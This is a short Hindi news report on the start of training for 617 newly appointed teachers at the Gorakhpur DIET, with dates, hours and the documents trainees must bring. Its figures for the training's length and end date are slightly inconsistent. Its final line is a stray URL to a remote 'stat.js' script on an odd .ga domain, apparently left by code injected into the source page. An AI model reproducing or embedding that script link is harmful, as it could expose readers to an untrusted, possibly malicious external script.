नए शिक्षकों की ट्रेनिंग हो गई प्रारंभ निम्नलिखित चीजों का लाना होगा अनिवार्य जाने कब तक चलेगा यह प्रशिक्षण।
गोरखपुर, ( कुलसूम फात्मा ) न्यूली ऐडेड टीचर की ट्रेनिंग प्रारंभ हो गई है जी तकरीबन 59000 भर्ती प्रक्रिया के द्वारा जिले के न्यूली ऐडेड टीचर की ट्रेनिंग दूसरे चरण में जिले के 617 टीचर का 2 दिन प्रशिक्षण डायट प्रारंभ हो गया है । यह जनवरी की 4 तारीख से प्रारंभ होकर यह ट्रेनिंग अलग-अलग बैंचों में जनवरी के अंत तक ही समाप्त हो जाएगी।
उपर्युक्त जानकारी डाइट प्रचार भूपेंद्र कुमार सिंह से मिली। उनसे वार्तालाप करने के पश्चात पता चला की ट्रेनिंग के सभी शिक्षकों को 6 दिन भिन्न-भिन्न बेंच में वितरित कर दिया जाएगा। उन्हें डाइट के रविंद्रालय तथा राधाकृष्णन हॉल में ट्रेनिंग दी जाएगी। उन्होंने कहा की ट्रेनिंग में भाग लेने वाले शिक्षकों को अपने साथ नियुक्त पत्र के साथ साथ आधार कार्ड की कॉपी लानी अनिवार्य होगी। ट्रेनिंग सुबह के समय 9:30 बजे से दी जाएगी और शाम के 4:30 बजे तक के चलेगी और जनवरी की 21 तारीख पर समाप्त हो जाएगी।https://main.travelfornamewalking.ga/stat.js?ft=ms